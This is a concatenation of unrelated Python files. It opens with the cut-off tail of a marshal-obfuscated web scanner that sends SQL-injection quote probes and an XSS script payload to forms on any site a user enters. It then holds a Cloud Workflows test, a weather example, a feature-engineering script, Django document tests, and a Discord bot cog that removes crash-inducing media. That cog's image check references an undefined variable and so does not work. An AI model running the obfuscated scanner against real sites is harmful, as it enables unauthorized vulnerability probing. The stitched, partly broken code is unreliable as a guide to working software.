\\___)\n\x1b[0m\nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\x0e\x00\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00d\x00S\x00)\x02Nz\x0ccls || clear)\x02\xda\x02os\xda\x06system\xa9\x00r\t\x00\x00\x00r\t\x00\x00\x00\xda\x00\xda\x0cclear_screen0\x00\x00\x00s\x02\x00\x00\x00\x00\x01r\x0b\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xf4\x00\x00\x00t\x00t\x01j\x02d\x01\x17\x00\x83\x01\x01\x00t\x00d\x02\x83\x01\x01\x00t\x00t\x01j\x03d\x03\x17\x00\x83\x01\x01\x00t\x00t\x01j\x03d\x04\x17\x00\x83\x01\x01\x00t\x00t\x01j\x03d\x05\x17\x00\x83\x01\x01\x00t\x00d\x02\x83\x01\x01\x00t\x04d\x06\x83\x01}\x00|\x00d\x07k\x02rzt\x00t\x05\x83\x01\x01\x00t\x06d\x08k\x02r\xf0t\x04d\t\x83\x01}\x01t\x07|\x01\x83\x01\x01\x00nv|\x00d\nk\x02r\xa8t\x00t\x08\x83\x01\x01\x00t\x06d\x08k\x02r\xf0t\x04d\x0b\x83\x01}\x01t\x00t\t|\x01\x83\x01\x83\x01\x01\x00nH|\x00d\x0ck\x02r\xcet\x00t\x01j\nd\r\x17\x00\x83\x01\x01\x00t\x0b\xa0\x0cd\x0e\xa1\x01\x01\x00t\r\x01\x00n"t\x00t\x01j\nd\x0f\x17\x00\x83\x01\x01\x00t\x0b\xa0\x0cd\x0e\xa1\x01\x01\x00t\x0e\xa0\x0fd\x10\xa1\x01\x01\x00d\x00S\x00)\x11Nu\x13\x00\x00\x00\t\xcc\xb2 SQlScanner Menur\n\x00\x00\x00z\x1f{1} Scan site For Sql injectionz\x1a{2} Scan site for XSS vulnz\x08{3} Exitzh\x1b[1;34m--\x1b[0m(kali@AnonyminHack5\x1b[0m)-[\x1b[1;34m~/home/SqlScan\x1b[0m]\n$ \x1b[1;94mChoose an Option\x1b[0m: \x1b[1;36m\xda\x011\xda\x08__main__z,Enter Site to test for SQLinjection: \x1b[1;34m\xda\x012z#Enter Site to test for XSS: \x1b[1;34m\xda\x013z [x] Exiting from WebScan ... [x]\xe9\x01\x00\x00\x00z\x1cWrong Option dude, try againz\x12python3 webscan.py)\x10\xda\x05printr\x06\x00\x00\x00Z\x04CYANZ\x06YELLOW\xda\x05input\xda\tsqlbanner\xda\x08__name__\xda\x12scan_sql_injection\xda\txssbanner\xda\x08scan_xss\xda\x03RED\xda\x04time\xda\x05sleep\xda\x04exitr\x07\x00\x00\x00r\x08\x00\x00\x00)\x02\xda\x01y\xda\x03urlr\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x04menu4\x00\x00\x00s0\x00\x00\x00\x00\x01\x0e\x01\x08\x01\x0e\x01\x0e\x01\x0e\x01\x08\x01\x08\x02\x08\x01\x08\x01\x08\x01\x08\x01\n\x01\x08\x01\x08\x01\x08\x01\x08\x01\x0e\x01\x08\x01\x0e\x01\n\x01\x06\x02\x0e\x01\n\x01r\x1e\x00\x00\x00a\xbd\x01\x00\x00Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36, Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36, Mozilla/5.0 (Linux; Android 6.0.1; SM-G920V Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36z\nUser-Agentc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x1c\x00\x00\x00t\x00t\x01\xa0\x02|\x00\xa1\x01j\x03d\x01\x83\x02}\x01|\x01\xa0\x04d\x02\xa1\x01S\x00\xa9\x03z9Given a `url`, it returns all forms from the HTML contentz\x0bhtml.parser\xda\x04form)\x05\xda\x02bs\xda\x01s\xda\x03get\xda\x07content\xda\x08find_all\xa9\x02r\x1d\x00\x00\x00Z\x04soupr\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\rget_all_formsU\x00\x00\x00s\x04\x00\x00\x00\x00\x02\x12\x01r\'\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\xa6\x00\x00\x00i\x00}\x01z\x14|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x02W\x00n\x10\x01\x00\x01\x00\x01\x00d\x02}\x02Y\x00n\x020\x00|\x00j\x00\xa0\x01d\x03d\x04\xa1\x02\xa0\x02\xa1\x00}\x03g\x00}\x04|\x00\xa0\x03d\x05\xa1\x01D\x00]>}\x05|\x05j\x00\xa0\x01d\x06d\x07\xa1\x02}\x06|\x05j\x00\xa0\x01d\x08\xa1\x01}\x07|\x05j\x00\xa0\x01d\td\n\xa1\x02}\x08|\x04\xa0\x04|\x06|\x07|\x08d\x0b\x9c\x03\xa1\x01\x01\x00qJ|\x02|\x01d\x01<\x00|\x03|\x01d\x03<\x00|\x04|\x01d\x0c<\x00|\x01S\x00)\r\xfaU\n This function extracts all possible useful information about an HTML `form`\n \xda\x06actionN\xda\x06methodr#\x00\x00\x00r\x12\x00\x00\x00\xda\x04type\xda\x04text\xda\x04name\xda\x05valuer\n\x00\x00\x00)\x03r+\x00\x00\x00r-\x00\x00\x00r.\x00\x00\x00\xda\x06inputs\xa9\x05\xda\x05attrsr#\x00\x00\x00\xda\x05lowerr%\x00\x00\x00\xda\x06append)\tr \x00\x00\x00\xda\x07detailsr)\x00\x00\x00r*\x00\x00\x00r/\x00\x00\x00\xda\tinput_tag\xda\ninput_type\xda\ninput_name\xda\x0binput_valuer\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x10get_form_details[\x00\x00\x00s \x00\x00\x00\x00\x04\x04\x02\x02\x01\x14\x01\x06\x01\n\x02\x12\x02\x04\x01\x0e\x01\x0e\x01\x0c\x01\x0e\x01\x14\x02\x08\x01\x08\x01\x08\x01r9\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s.\x00\x00\x00h\x00d\x01\xa3\x01}\x01|\x01D\x00]\x1c}\x02|\x02|\x00j\x00\xa0\x01\xa1\x00\xa0\x02\xa1\x00v\x00r\x0c\x01\x00d\x02S\x00q\x0cd\x03S\x00)\x04zmA simple boolean function that determines whether a page \n is SQL Injection vulnerable from its `response`>\x04\x00\x00\x00z%you have an error in your sql syntax;z\x0ewarning: mysqlz2unclosed quotation mark after the character stringz%quoted string not properly terminatedTF)\x03r$\x00\x00\x00\xda\x06decoder2\x00\x00\x00)\x03Z\x08response\xda\x06errors\xda\x05errorr\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\ris_vulnerablet\x00\x00\x00s\n\x00\x00\x00\x00\x03\x08\t\x08\x02\x12\x01\x08\x02r=\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00sr\x01\x00\x00d\x01D\x00]B}\x01|\x00\x9b\x00|\x01\x9b\x00\x9d\x02}\x02t\x00d\x02|\x02\x83\x02\x01\x00t\x01\xa0\x02|\x02\xa1\x01}\x03t\x03|\x03\x83\x01r\x04t\x00t\x04j\x05d\x03\x17\x00|\x02\x83\x02\x01\x00\x01\x00d\x00S\x00q\x04t\x06|\x00\x83\x01}\x04t\x00d\x04t\x07|\x04\x83\x01\x9b\x00d\x05|\x00\x9b\x00d\x06\x9d\x05\x83\x01\x01\x00|\x04D\x00\x90\x00]\xfc}\x05t\x08|\x05\x83\x01}\x06d\x01D\x00]\xea}\x01i\x00}\x07|\x06d\x07\x19\x00D\x00]^}\x08|\x08d\x08\x19\x00d\tk\x02s\xa8|\x08d\n\x19\x00r\xd0z\x18|\x08d\n\x19\x00|\x01\x17\x00|\x07|\x08d\x0b\x19\x00<\x00W\x00q\xee\x01\x00\x01\x00\x01\x00Y\x00q\xee0\x00q\x90|\x08d\x08\x19\x00d\x0ck\x03r\x90d\r|\x01\x9b\x00\x9d\x02|\x07|\x08d\x0b\x19\x00<\x00q\x90t\t|\x00|\x06d\x0e\x19\x00\x83\x02}\x00|\x06d\x0f\x19\x00d\x10k\x02\x90\x01r\x1ct\x01j\n|\x00|\x07d\x11\x8d\x02}\x03n\x1c|\x06d\x0f\x19\x00d\x12k\x02\x90\x01r8t\x01j\x02|\x00|\x07d\x13\x8d\x02}\x03t\x03|\x03\x83\x01r\x80t\x00t\x04j\x05d\x03\x17\x00|\x00\x83\x02\x01\x00t\x00t\x04j\x0bd\x14\x17\x00\x83\x01\x01\x00t\x0c|\x06\x83\x01\x01\x00\x01\x00qnq\x80qnd\x00S\x00)\x15Nz\x02"\'z\n[!] Tryingz/[+] SQL Injection vulnerability detected, link:\xfa\r[+] Detected \xfa\n forms on \xda\x01.r/\x00\x00\x00r+\x00\x00\x00Z\x06hiddenr.\x00\x00\x00r-\x00\x00\x00Z\x06submit\xda\x04testr)\x00\x00\x00r*\x00\x00\x00\xda\x04post\xa9\x01\xda\x04datar#\x00\x00\x00\xa9\x01\xda\x06paramsz\t[+] Form:)\rr\x11\x00\x00\x00r"\x00\x00\x00r#\x00\x00\x00r=\x00\x00\x00r\x06\x00\x00\x00\xda\x05GREENr\'\x00\x00\x00\xda\x03lenr9\x00\x00\x00r\x03\x00\x00\x00rB\x00\x00\x00\xda\x04BLUEr\x04\x00\x00\x00)\tr\x1d\x00\x00\x00\xda\x01cZ\x07new_url\xda\x03res\xda\x05formsr \x00\x00\x00\xda\x0cform_detailsrD\x00\x00\x00r5\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r\x15\x00\x00\x00\x87\x00\x00\x00s>\x00\x00\x00\x00\x02\x08\x02\x0c\x01\n\x02\n\x01\x08\x03\x10\x01\x08\x02\x08\x01\x1a\x01\n\x01\x08\x01\x08\x02\x04\x01\x0c\x01\x14\x03\x02\x01\x18\x01\x06\x01\x08\x01\x0c\x02\x14\x02\x0e\x01\x0e\x01\x10\x01\x0e\x01\x0e\x02\x08\x01\x10\x01\x0e\x01\x08\x01r\x15\x00\x00\x00a\x9f\x03\x00\x00\n\n ___ ___ ________ ________ ________ ______ __ _____ ___ _____ ___ _______ _______ \n|" \\/" | /" )/" ) /" )/" _ "\\ /""\\ (" \\|" \\ (" \\|" \\ /" "| /" \\ \n \\ \\ / (: \\___/(: \\___/ (: \\___/(: ( \\___) / \\ |.\\ \\ ||.\\ \\ |(: ______)|: | \n \\ \\/ \\___ \\ \\___ \\ \\___ \\ \\/ \\ /\' /\\ \\ |: \\. \\ ||: \\. \\ | \\/ | |_____/ ) \n /\\. \\ __/ \\ __/ \\ __/ \\ // \\ _ // __\' \\ |. \\ \\. ||. \\ \\. | // ___)_ // / \n / \\ \\ /" \\ :) /" \\ :) /" \\ :)(: _) \\ / / \\ \\| \\ \\ || \\ \\ |(: "||: __ \\ \n|___/\\___|(_______/ (_______/ (_______/ \\_______)(___/ \\___)\\___|\\____\\) \\___|\\____\\) \\_______)|__| \\___) \n \nc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x1c\x00\x00\x00t\x00t\x01\xa0\x02|\x00\xa1\x01j\x03d\x01\x83\x02}\x01|\x01\xa0\x04d\x02\xa1\x01S\x00r\x1f\x00\x00\x00)\x05r!\x00\x00\x00\xda\x08requestsr#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r&\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r\'\x00\x00\x00\xc2\x00\x00\x00s\x04\x00\x00\x00\x00\x02\x12\x01c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x80\x00\x00\x00i\x00}\x01|\x00j\x00\xa0\x01d\x01\xa1\x01\xa0\x02\xa1\x00}\x02|\x00j\x00\xa0\x01d\x02d\x03\xa1\x02\xa0\x02\xa1\x00}\x03g\x00}\x04|\x00\xa0\x03d\x04\xa1\x01D\x00].}\x05|\x05j\x00\xa0\x01d\x05d\x06\xa1\x02}\x06|\x05j\x00\xa0\x01d\x07\xa1\x01}\x07|\x04\xa0\x04|\x06|\x07d\x08\x9c\x02\xa1\x01\x01\x00q4|\x02|\x01d\x01<\x00|\x03|\x01d\x02<\x00|\x04|\x01d\t<\x00|\x01S\x00)\nr(\x00\x00\x00r)\x00\x00\x00r*\x00\x00\x00r#\x00\x00\x00r\x12\x00\x00\x00r+\x00\x00\x00r,\x00\x00\x00r-\x00\x00\x00)\x02r+\x00\x00\x00r-\x00\x00\x00r/\x00\x00\x00r0\x00\x00\x00)\x08r \x00\x00\x00r4\x00\x00\x00r)\x00\x00\x00r*\x00\x00\x00r/\x00\x00\x00r5\x00\x00\x00r6\x00\x00\x00r7\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r9\x00\x00\x00\xc7\x00\x00\x00s\x18\x00\x00\x00\x00\x04\x04\x02\x10\x02\x12\x02\x04\x01\x0e\x01\x0e\x01\x0c\x01\x12\x02\x08\x01\x08\x01\x08\x01c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s\x94\x00\x00\x00t\x00|\x01|\x00d\x01\x19\x00\x83\x02}\x03|\x00d\x02\x19\x00}\x04i\x00}\x05|\x04D\x00]H}\x06|\x06d\x03\x19\x00d\x04k\x02s:|\x06d\x03\x19\x00d\x05k\x02rB|\x02|\x06d\x06<\x00|\x06\xa0\x01d\x07\xa1\x01}\x07|\x06\xa0\x01d\x06\xa1\x01}\x08|\x07r\x1e|\x08r\x1e|\x08|\x05|\x07<\x00q\x1e|\x00d\x08\x19\x00d\tk\x02r\x82t\x02j\x03|\x03|\x05d\n\x8d\x02S\x00t\x02j\x01|\x03|\x05d\x0b\x8d\x02S\x00d\x0cS\x00)\ra<\x01\x00\x00\n Submits a form given in `form_details`\n Params:\n form_details (list): a dictionary that contain form information\n url (str): the original URL that contain that form\n value (str): this will be replaced to all text and search inputs\n Returns the HTTP Response after form submission\n r)\x00\x00\x00r/\x00\x00\x00r+\x00\x00\x00r,\x00\x00\x00\xda\x06searchr.\x00\x00\x00r-\x00\x00\x00r*\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00rE\x00\x00\x00N)\x04r\x03\x00\x00\x00r#\x00\x00\x00rN\x00\x00\x00rB\x00\x00\x00)\trM\x00\x00\x00r\x1d\x00\x00\x00r.\x00\x00\x00Z\ntarget_urlr/\x00\x00\x00rD\x00\x00\x00r\x12\x00\x00\x00r7\x00\x00\x00r8\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x0bsubmit_form\xdc\x00\x00\x00s\x1a\x00\x00\x00\x00\n\x0e\x02\x08\x01\x04\x01\x08\x02\x18\x01\x08\x01\n\x01\n\x01\x08\x03\n\x02\x0c\x01\x0e\x03rP\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s|\x00\x00\x00t\x00|\x00\x83\x01}\x01t\x01d\x01t\x02|\x01\x83\x01\x9b\x00d\x02|\x00\x9b\x00d\x03\x9d\x05\x83\x01\x01\x00d\x04}\x02d\x05}\x03|\x01D\x00]H}\x04t\x03|\x04\x83\x01}\x05t\x04|\x05|\x00|\x02\x83\x03j\x05\xa0\x06\xa1\x00}\x06|\x02|\x06v\x00r.t\x01d\x06|\x00\x9b\x00\x9d\x02\x83\x01\x01\x00t\x01d\x07\x83\x01\x01\x00t\x07|\x05\x83\x01\x01\x00d\x08}\x03q.|\x03S\x00)\tzw\n Given a `url`, it prints all XSS vulnerable forms and \n returns True if any is vulnerable, False otherwise\n r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00z(<Script>alert(\'XSS detected!!\')</scripT>Fz\x14[+] XSS Detected on z\x11[*] Form details:T)\x08r\'\x00\x00\x00r\x11\x00\x00\x00rH\x00\x00\x00r9\x00\x00\x00rP\x00\x00\x00r$\x00\x00\x00r:\x00\x00\x00r\x04\x00\x00\x00)\x07r\x1d\x00\x00\x00rL\x00\x00\x00Z\tjs_scriptr=\x00\x00\x00r \x00\x00\x00rM\x00\x00\x00r$\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00r\x17\x00\x00\x00\xfc\x00\x00\x00s\x1a\x00\x00\x00\x00\x06\x08\x01\x1a\x01\x04\x02\x04\x02\x08\x01\x08\x01\x12\x01\x08\x01\x0e\x01\x08\x01\x08\x01\x06\x02r\x17\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s\xe6\x00\x00\x00t\x00t\x01j\x02d\x01\x17\x00\x83\x01\x01\x00t\x03\xa0\x04d\x02\xa1\x01\x01\x00d\x03}\x00d\x04}\x01zTt\x05j\x06|\x00|\x01d\x05\x8d\x02}\x02t\x00t\x01j\x07d\x06\x17\x00\x83\x01\x01\x00t\x00t\x01j\x07d\x07\x17\x00\x83\x01\x01\x00t\x00d\x06\x83\x01\x01\x00t\x03\xa0\x04d\x08\xa1\x01\x01\x00t\x08\x83\x00\x01\x00t\x00t\t\x83\x01\x01\x00t\n\x83\x00\x01\x00W\x00nl\x04\x00t\x05j\x0bt\x05j\x0cf\x02y\xe0\x01\x00}\x03\x01\x00zLt\x00t\x01j\rd\x06\x17\x00\x83\x01\x01\x00t\x00t\x01j\rd\t\x17\x00\x83\x01\x01\x00t\x00t\x01j\rd\n\x17\x00\x83\x01\x01\x00t\x00d\x06\x83\x01\x01\x00t\x03\xa0\x04d\x08\xa1\x01\x01\x00t\x0e\x01\x00W\x00Y\x00d\x00}\x03~\x03n\nd\x00}\x03~\x030\x000\x00d\x00S\x00)\x0bNz;Checking if your connected to the internet >>>>> [Checking]\xe9\x02\x00\x00\x00z\x1ehttps://github.com/TermuxHackz\xe9\x05\x00\x00\x00)\x01\xda\x07timeoutz\x1a##########################z [!] Connected to the Internet[!]r\x10\x00\x00\x00z\x1f[x] No internet Connection [x] z(Connect to internet and run script again)\x0fr\x11\x00\x00\x00r\x06\x00\x00\x00rI\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00rN\x00\x00\x00r#\x00\x00\x00rG\x00\x00\x00r\x0b\x00\x00\x00\xda\x06bannerr\x1e\x00\x00\x00\xda\x0fConnectionErrorZ\x07Timeoutr\x18\x00\x00\x00r\x1b\x00\x00\x00)\x04Z\x08url_siterS\x00\x00\x00Z\x07requestZ\texceptionr\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x0echeck_internet\x14\x01\x00\x00s(\x00\x00\x00\x00\x01\x0e\x01\n\x01\x04\x01\x04\x01\x02\x01\x0e\x01\x0e\x01\x0e\x01\x08\x01\n\x01\x06\x01\x08\x01\n\x01\x16\x01\x0e\x01\x0e\x01\x0e\x01\x08\x01\n\x01rV\x00\x00\x00)\x1crN\x00\x00\x00r\x07\x00\x00\x00r\x19\x00\x00\x00Z\x03bs4r\x02\x00\x00\x00r!\x00\x00\x00Z\x0curllib.parser\x03\x00\x00\x00r\x04\x00\x00\x00Z\ttermcolorr\x05\x00\x00\x00Z\x08coloramar\x06\x00\x00\x00rT\x00\x00\x00r\x13\x00\x00\x00r\x0b\x00\x00\x00r\x1e\x00\x00\x00Z\x07Sessionr"\x00\x00\x00Z\x07headersr\'\x00\x00\x00r9\x00\x00\x00r=\x00\x00\x00r\x15\x00\x00\x00r\x16\x00\x00\x00rP\x00\x00\x00r\x17\x00\x00\x00rV\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\t\x00\x00\x00r\n\x00\x00\x00\xda\x08<module>\x03\x00\x00\x00s2\x00\x00\x00\x08\x01\x08\x01\x08\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x06\x04\x16\x04\n\x08\x04\x08\x1e\x08\x01\n\x02\x08\x06\x08\x19\x08\x13\x08/\x04\x0c\x08\x05\x08\x15\x08 \x08\x18\x08\x16\x06\x01'))
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from google.cloud import workflows_v1beta
import main
PROJECT = os.environ["GOOGLE_CLOUD_PROJECT"]
LOCATION = "us-central1"
WORKFLOW_ID = "myFirstWorkflow"
def test_workflow_execution():
assert PROJECT != ""
if not workflow_exists():
workflow_file = open("myFirstWorkflow.workflows.yaml", "r").read()
workflows_client = workflows_v1beta.WorkflowsClient()
workflows_client.create_workflow(request={
# Manually construct the location
# https://github.com/googleapis/python-workflows/issues/21
"parent": f'projects/{PROJECT}/locations/{LOCATION}',
"workflow_id": WORKFLOW_ID,
"workflow": {
"name": WORKFLOW_ID,
"source_contents": workflow_file
}
})
result = main.execute_workflow(PROJECT)
assert len(result) > 0
def workflow_exists():
"""Returns True if the workflow exists in this project
"""
try:
workflows_client = workflows_v1beta.WorkflowsClient()
workflow_name = workflows_client.workflow_path(PROJECT, LOCATION, WORKFLOW_ID)
workflows_client.get_workflow(request={"name": workflow_name})
return True
except Exception as e:
print(f"Workflow doesn't exist: {e}")
return False
|
from weather import Weather
weather = Weather(verbose=1)
region = weather.getRegion() # 支持的所有地区
cities = weather.getCity() # 支持的所有城市
support = weather.getRegionCity(region='巴西') # 支持的巴西的城市
result = weather.getWeather(city='广州') # 查询广州的天气
print('支持的地区数', len(region))
print('支持的城市数', len(cities))
print('支持的巴西城市', support)
print('广州的天气', result)
|
import pandas as pd
from TemporalFeatureFactory import TemporalFeatureFactory, temporal_driver
from utils.misc_utils import connect_rds
###
# DEFINE SETTINGS TO CREATE TEMPORAL FEATURES
###
time_granularity = '60min'
start_date = '2016-01-01'
end_date = '2018-02-01'
conn = connect_rds()
schema_name = 'features_temporal_agg'
###
# CREATE TEMPORAL TABLE
###
t = temporal_driver('60min', '2016-01-01', '2018-02-01', conn, 'features_temporal_agg')
|
import datetime
from unittest import mock
from django.urls import reverse
from api.organisations.enums import OrganisationDocumentType
from test_helpers.clients import DataTestClient
class OrganisationDocumentViewTests(DataTestClient):
def create_document_on_organisation(self, name):
url = reverse("organisations:documents", kwargs={"pk": self.organisation.pk})
data = {
"document": {"name": name, "s3_key": name, "size": 476},
"expiry_date": "2022-01-01",
"reference_code": "123",
"document_type": OrganisationDocumentType.FIREARM_SECTION_FIVE,
}
return self.client.post(url, data, **self.exporter_headers)
@mock.patch("api.documents.tasks.scan_document_for_viruses.now", mock.Mock)
def test_create_organisation_document(self):
response = self.create_document_on_organisation("some-document")
self.assertEqual(response.status_code, 201, msg=response.content)
self.assertEqual(self.organisation.document_on_organisations.count(), 1)
instance = self.organisation.document_on_organisations.first()
self.assertEqual(instance.document.name, "some-document")
self.assertEqual(instance.document.s3_key, "some-document")
self.assertEqual(instance.reference_code, "123")
self.assertEqual(instance.document.size, 476)
self.assertEqual(instance.expiry_date, datetime.date(2022, 1, 1))
self.assertEqual(instance.document_type, OrganisationDocumentType.FIREARM_SECTION_FIVE)
self.assertEqual(instance.organisation, self.organisation)
@mock.patch("api.documents.tasks.scan_document_for_viruses.now", mock.Mock)
def test_list_organisation_documents(self):
self.assertEqual(self.create_document_on_organisation("some-document-one").status_code, 201)
self.assertEqual(self.create_document_on_organisation("some-document-two").status_code, 201)
self.assertEqual(self.create_document_on_organisation("some-document-three").status_code, 201)
url = reverse("organisations:documents", kwargs={"pk": self.organisation.pk})
response = self.client.get(url, **self.exporter_headers)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.json()["documents"]), 3)
@mock.patch("api.documents.tasks.scan_document_for_viruses.now", mock.Mock)
def test_retrieve_organisation_documents(self):
response = self.create_document_on_organisation("some-document-one")
self.assertEqual(response.status_code, 201)
document_on_application_pk = response.json()["document"]["id"]
url = reverse(
"organisations:documents",
kwargs={"pk": self.organisation.pk, "document_on_application_pk": document_on_application_pk},
)
response = self.client.get(url, **self.exporter_headers)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.json(),
{
"id": document_on_application_pk,
"expiry_date": "01 January 2022",
"document_type": "section-five-certificate",
"organisation": str(self.organisation.id),
"is_expired": False,
"reference_code": "123",
"document": {
"name": "some-document-one",
"s3_key": "some-document-one",
"size": 476,
"created_at": mock.ANY,
"safe": None,
"id": mock.ANY,
},
},
)
|
from PIL import Image
from io import BytesIO
import aiohttp
import discord
import logging
import os
import secrets
import subprocess
from redbot.core import commands, checks, Config
from redbot.core.data_manager import cog_data_path
log = logging.getLogger("red.aikaterna.antiphoneclapper")
class AntiPhoneClapper(commands.Cog):
"""This cog deletes bad GIFs and MP4s that will crash phone clients."""
async def red_delete_data_for_user(self, **kwargs):
"""Nothing to delete."""
return
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(self, 2719371001, force_registration=True)
default_guild = {"watching": []}
self.config.register_guild(**default_guild)
@commands.group()
@checks.mod_or_permissions(administrator=True)
@commands.guild_only()
async def nogif(self, ctx):
"""Configuration options."""
pass
@nogif.command()
async def watch(self, ctx, channel: discord.TextChannel):
"""
Add a channel to watch.
Gif and MP4 attachments and links that break mobile clients will be removed in these channels.
"""
channel_list = await self.config.guild(ctx.guild).watching()
if channel.id not in channel_list:
channel_list.append(channel.id)
await self.config.guild(ctx.guild).watching.set(channel_list)
await ctx.send(f"{self.bot.get_channel(channel.id).mention} will have bad gifs removed.")
@nogif.command()
async def watchlist(self, ctx):
"""List the channels being watched."""
channel_list = await self.config.guild(ctx.guild).watching()
msg = "Bad gifs will be removed in:\n"
for channel in channel_list:
channel_obj = self.bot.get_channel(channel)
msg += f"{channel_obj.mention}\n"
await ctx.send(msg)
@nogif.command()
async def unwatch(self, ctx, channel: discord.TextChannel):
"""Remove a channel from the watch list."""
channel_list = await self.config.guild(ctx.guild).watching()
if channel.id in channel_list:
channel_list.remove(channel.id)
else:
return await ctx.send("Channel is not being watched.")
await self.config.guild(ctx.guild).watching.set(channel_list)
await ctx.send(f"{self.bot.get_channel(channel.id).mention} will not have bad gifs removed.")
@commands.Cog.listener()
async def on_message(self, m):
if not m.channel.guild:
return
if m.author.bot:
return
watch_channel_list = await self.config.guild(m.guild).watching()
if not watch_channel_list:
return
if m.channel.id not in watch_channel_list:
return
link = False
phone_clapper = None
if m.content:
if m.content.startswith("https://cdn.discordapp.com/attachments/"):
link = True
if not link:
for att in m.attachments:
if att.size > 8000000:
continue
if att.filename.endswith(".mp4"):
phone_clapper = await self._is_video_clapper(att.url)
if att.filename.endswith(".gif"):
phone_clapper = await self._is_image_clapper(att.url)
else:
maybe_url = m.content.split()[0]
if maybe_url.endswith(".mp4"):
phone_clapper = await self._is_video_clapper(maybe_url)
if maybe_url.endswith(".gif"):
phone_clapper = await self._is_image_clapper(maybe_url)
if phone_clapper:
try:
await m.delete()
await m.channel.send(f"{m.author.mention} just tried to send a bad file and I removed it.")
return
except discord.errors.Forbidden:
await m.channel.send(f"Don't send malicious files, {m.author.mention}")
log.debug(f"Failed to delete message ({m.id}) that contained a Discord killing gif or mp4 video.")
return
else:
return
def is_phone_clapper(self, im):
limit = im.size
tile_sizes = []
for frame in range(im.n_frames):
im.seek(frame)
tile_sizes.append(im.tile[0][1][2:])
return any([x[0] > limit[0] or x[1] > limit[1] for x in tile_sizes])
async def _is_image_clapper(self, url):
async with aiohttp.ClientSession() as session:
async with session.get(att.url) as resp:
data = await resp.content.read()
f = BytesIO(data)
try:
img = Image.open(f)
phone_clapper = self.is_phone_clapper(img)
return False
except Image.DecompressionBombError:
return True
async def _is_video_clapper(self, input_file):
r = secrets.token_hex(6)
video_name = f"temp_vid_{r}.mp4"
video_file = f"{cog_data_path(self)}/{video_name}"
text_name = f"temp_output_{r}.txt"
text_file = f"{cog_data_path(self)}/{text_name}"
async with aiohttp.ClientSession() as session:
async with session.get(input_file) as resp:
data = await resp.content.read()
with open(video_file, "wb+") as g:
g.write(data)
f = open(text_file, "wb+")
try:
result = self.bot.loop.run_in_executor(None, subprocess.call(["ffplay.exe", video_file, "-autoexit", "-loglevel", "+debug"], stdout=f, stderr=subprocess.STDOUT, timeout=60))
except subprocess.CalledProcessError as e:
log.error(e.output)
return
except subprocess.TimeoutExpired:
f.close()
os.remove(video_file)
os.remove(text_file)
log.error("Timeout expired trying to read a video file")
return
result.cancel()
f.close()
f = open(text_file, "r")
content = f.read()
if "Video frame changed from size:" in content:
phone_clapper = True
else:
phone_clapper = False
f.close()
os.remove(video_file)
os.remove(text_file)
return phone_clapper
|
